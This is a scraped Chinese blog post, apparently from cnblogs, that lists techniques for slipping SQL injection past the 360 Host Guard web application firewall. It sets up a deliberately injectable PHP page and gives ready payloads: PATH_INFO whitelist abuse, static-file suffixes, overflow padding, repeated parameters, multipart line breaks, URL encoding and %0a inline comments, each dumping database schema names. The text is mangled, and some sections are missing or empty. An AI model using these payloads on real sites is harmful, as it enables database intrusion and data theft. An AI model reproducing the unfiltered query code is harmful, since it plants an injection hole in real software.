标签:mil enc 形式 逻辑 超出 内联 add 技术 share
0x00 前言
0x01 环境搭建
1
2
|
id = _REQUEST[‘ id ‘]; query = "SELECT * FROM admin WHERE id = id " ; |
姿势一:网站后台白名单
在360主机卫士客户端设置中存在默认网站后台白名单,如图:
<ignore_js_op>
利用PHP中的PATH_INFO问题,随便挑选一个白名单加在后面,可成功bypass。
<ignore_js_op>
1
|
/ test.php / admin? id = 1 union select 1 , 2 , schema_name from information_schema.SCHEMATA |
姿势二:静态资源
1
|
/ test.php / 1. png? id = 1 union select 1 , 2 , schema_name from information_schema.SCHEMATA |
姿势三:缓冲区溢出
1
2
3
|
/ test.php POST: id = 1 and ( select 1 ) = ( Select 0 xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ) union select 1 , 2 , schema_name from information_schema.SCHEMATA |
姿势四:uri参数溢出
01
02
03
04
05
06
07
08
09
10
11
12
|
http : / / 192.1 68.2 04.1 28 / test.php POST: id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 & id = 1 union select 1 , 2 , schema_name % 0 a / ! from / information_schema.SCHEMATA |
1
2
|
/ test.php? id = 1 union select 1 , 2 , schema_name from information_schema.SCHEMATA POST:aaa |
姿势六:multipart/form-data格式
1
2
3
4
5
|
------WebKitFormBoundaryACZoaLJJzUwc4hYM Content - Disposition : form - data ; name = "id" 1 union / * ! select * / 1 , 2 , schema_name【这里使用Enter换行】 from information_schema.SCHEMATA ------WebKitFormBoundaryACZoaLJJzUwc4hYM-- |
如果转换数据包进行绕过呢?
首先,新建一个html页面:
1
2
3
4
5
6
7
8
9
|
< html > < head > < / head > < body > < input type = "text" name = "id" > < input type = "submit" > < / form > < / body > < / html > |
姿势七:编码绕过
1
2
|
/ test.php? id = 1 POST: id = 1 % 55 nion % 53 elect / * ! 1 , 2 , schema_name % 0 aFROM information_schema.SCHEMATA * / |
姿势八:%0a+内联注释
1
2
3
|
http : / / 192.1 68.2 04.1 28 / test.php POST: id = 1 union% 0 a / * ! 12345 select * / 1 , 2 , schema_name% 0 a / * ! 12345 from * / information_schema.SCHEMATA |
0x03 自动化Bypass
0x04 END
标签:mil enc 形式 逻辑 超出 内联 add 技术 share
原文地址:https://www.cnblogs.com/echod/p/9149962.html